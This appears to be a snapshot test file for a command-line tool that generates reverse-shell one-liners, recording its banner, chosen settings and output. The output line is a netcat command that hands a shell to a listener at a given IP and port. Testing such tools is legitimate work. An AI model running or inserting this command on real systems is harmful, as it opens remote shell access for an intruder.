tests/snapshots/cli__tests__generate_format.snap
---
source: tests/cli.rs
expression: stdout
---

 _______           _______  _        _        ______________    _______  _______  _______  _______  _______ 
(  ____ \|\     /|(  ____ \( \      ( \      ( |          | )  (  ____ \(  ___  )(  ____ )(  ____ \(  ____ \
| (    \/| )   ( || (    \/| (      | (      | |          | |  | (    \/| (   ) || (    )|| (    \/| (    \/
| (_____ | (___) || (__    | |      | |      (_|__________|_)  | (__    | |   | || (____)|| |      | (__    
(_____  )|  ___  ||  __)   | |      | |            |  |        |  __)   | |   | ||     __)| | ____ |  __)   
      ) || (   ) || (      | |      | |            |  |        | (      | |   | || (\ (   | | \_  )| (      
/\____) || )   ( || (____/\| (____/\| (____/\      |  |        | )      | (___) || ) \ \__| (___) || (____/\
\_______)|/     \|(_______/(_______/(_______/      |  |        |/       (_______)|/   \__/(_______)(_______/
                                                   |__|                                        version 1.0.1
                                                   (__)
~~~~~~~~~~~~~~~~~~~~~~~~~
Forging shells
~~~~~~~~~~~~~~~~~~~~~~~~~
Format : nc-c
IP     : 192.168.1.1
Port   : 7777
~~~~~~~~~~~~~~~~~~~~~~~~~

----------NC-C-----------
nc -c sh [36m192.168.1.1[39m [36m7777[39m
